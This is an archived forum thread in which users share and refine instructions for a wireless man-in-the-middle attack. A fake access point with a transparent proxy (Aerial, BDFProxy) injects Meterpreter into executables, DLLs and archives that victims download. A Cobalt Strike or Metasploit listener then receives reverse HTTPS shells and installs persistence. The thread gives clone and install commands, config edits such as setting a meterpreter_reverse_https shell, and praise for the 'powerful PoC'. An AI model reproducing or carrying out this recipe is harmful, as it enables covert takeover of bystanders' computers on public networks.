Video: Aerial Fake AP-TransparentProxy - Inject code in exe/dll with BDF-Proxy [Archive]

View Full Version : Video: Aerial Fake AP-TransparentProxy - Inject code in exe/dll with BDF-Proxy

ozzy66

2014-11-22, 14:40

A smal Video abaut:

- make a Fake AP and Transparent Proxy with Aerial (thx for the nice tool!)
- use BackdorFactory Proxy to Inject Meterpreter in download Files (exe, dll, rar, zip ...) (thx for the nice tool!)
- use Cobaltstrike as Listner and Install Persistent a Meterpreter (thx for the nice tool!)

link https://vimeo.com/112569640

cheers ozzy

Quest

2014-11-27, 00:27

Hi ozzy, and thanks for the video.

I would like to see(here) step by step instructions(howto) along with links to the programs used.

ozzy66

2014-11-27, 19:09

Hi ozzy, and thanks for the video.

I would like to see(here) step by step instructions(howto) along with links to the programs used.

its Easy...

1. Install BackdoorFaktory Proxy

git clone git clone https://github.com/secretsquirrel/BDFProxy

cd BDFProxy
./install.sh

(thx Rarity)

2. Install Aerial WiFi

git clone https://github.com/Nick-the-Greek/Aerial

CobaldStrike Trial (Is not need. I use it only for Presistent instal of Meterpreter. You can use BackdoorFactory Proxy rc-script to connect)

http://www.advancedpentest.com/trial

3 change in /etc/default/udhcpd the second line to: DHCPD_ENABLED="yes"
if you like meterpreter change the line to: SHELL = meterpreter_reverse_https in the bdfproxy.cfg

4. Start Aerial (options as in the Video)

5. Close the windows: output-ssl.log (sslstrip)

6. run BackdoorFactory Proxy (show Video)

7 If you not use Cobaltsrike run the: bdfproxy_msf_resource.rc (in the bdf-proxy file)

i hope that help you...

ozzy

Nick_the_Greek

2014-11-27, 20:34

Well done ozzy66! Nice work ;)
It's a good idea. I will try to implement in the future a new mode in Aerial to do on the fly code inject in exe/dll files.

ozzy66

2014-11-27, 22:16

It's a good idea. I will try to implement in the future a new mode in Aerial to do on the fly code inject in exe/dll files.

that was my goal Nick the Greek ;) thx..!

I hope you make Aerial work to NetHunter, your toll is great!

Rarity

2014-11-29, 08:10

1. Install BackdoorFaktory Proxy

git clone https://github.com/secretsquirrel/the-backdoor-factory bdf/

cd bdf
./install.sh

I think you mean

git clone https://github.com/secretsquirrel/BDFProxy

cd BDFProxy;

./install.sh

Very powerful PoC, thanks for sharing!!